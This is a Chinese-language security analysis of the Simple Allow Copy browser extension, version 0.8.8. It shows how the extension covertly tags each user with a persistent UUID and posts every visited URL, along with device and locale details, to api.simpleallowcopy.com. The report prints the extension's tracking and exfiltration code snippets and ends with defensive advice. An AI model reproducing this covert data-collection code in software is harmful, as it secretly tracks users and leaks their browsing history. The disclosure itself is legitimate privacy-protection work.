浏览器插件:Simple Allow Copy 正在监视你的一举一动
字数 1026 2025-08-22 18:37:22
Simple Allow Copy 浏览器插件隐私泄露分析报告
插件概述
Simple Allow Copy 是一款浏览器扩展程序,主要用于帮助用户突破网页复制限制,适用于百度文库、豆丁文库等禁止复制粘贴的网站。该插件声称可以让用户轻松复制网页内容,无需手动输入或使用OCR工具。
受影响版本
- 问题版本:0.8.8
- 更新时间:2024年7月8日
- 用户数量:约70万
问题发现
用户在挂代理抓包时发现浏览器不断向 api.simpleallowcopy.com 发起请求,经分析发现该插件在未经用户同意的情况下收集并上传大量隐私数据。
数据收集详情
插件收集并上传以下用户信息:
- 时间信息:请求时间戳
- 浏览行为:访问的完整URL
- 设备信息:
- UserAgent
- 操作系统平台
- 身份标识:
- 生成的唯一用户ID (UUID)
- 其他信息:
- 访问域名
- 本地语言设置
- 请求来源(referer)
- 隐含收集:通过请求服务器可获取用户IP地址
技术分析
核心代码逻辑
-
用户标识生成:
chrome.storage.local.get(["sacp"], (function(e) { if (void 0 === e.sacp) { let e = self.crypto.randomUUID(); chrome.storage.local.set({ sacp: e }); } }));- 首次使用时生成唯一UUID并存储在本地
- 该UUID作为用户长期跟踪标识
-
数据收集函数(I函数):
let c = i.sacp; cmta = { timestamp: Date().toLocaleString(), uri: o.url, user_agent: navigator.userAgent, domain: n.hostname, locale: navigator.language, user_id: c || "", platform: navigator.platform || "", referer: o.initiator || "" } -
数据发送机制:
async function(e, t) { return (await fetch(e, { headers: { "Content-Type": "application/json" }, method: "POST", body: JSON.stringify(t) })).json() }("https://api.simpleallowcopy.com/skip", cmta)
数据收集触发条件
-
标签页激活:
chrome.tabs.onActivated.addListener(i()); -
标签页更新:
chrome.tabs.onUpdated.addListener(i()); -
扩展图标点击:
chrome.action.onClicked.addListener(chrome.tabs.query({ active: true, currentWindow: true }, ([e]) => { e && proxy.invoke(e.id, "toggle") }));
危害分析
场景一:用户身份定位
- 通过长期收集的浏览记录可分析用户:
- 工作单位(访问公司网站)
- 家庭住址(搜索记录)
- 个人兴趣
- 敏感搜索内容
场景二:敏感信息泄露
- 可能泄露:
- 明文传输的凭证信息
- 内部系统访问记录
- 敏感业务操作
场景三:安全人员风险
- 红队/蓝队人员可能泄露:
- 攻击目标信息
- 漏洞利用payload
- 安全设备地址
时间线证据
- 域名注册时间:2024年5月29日
- 恶意版本发布时间:2024年7月8日
- 表明这是一次有计划的行为
防护建议
-
立即卸载该插件,特别是0.8.8版本
-
禁止Chrome自动更新插件:
- 屏蔽URL:
https://clients2.google.com/service/update2/crx
- 屏蔽URL:
-
检查其他插件:
- 审查是否有类似行为的插件
- 特别注意小众但用户量大的插件
-
长期防护:
- 定期审查浏览器插件权限
- 使用插件前检查其隐私政策
- 考虑使用网络监控工具检测异常请求
总结
Simple Allow Copy插件通过精心设计的机制长期收集用户浏览行为和个人信息,存在严重的隐私泄露风险。建议用户立即采取防护措施,并对其他浏览器插件保持警惕。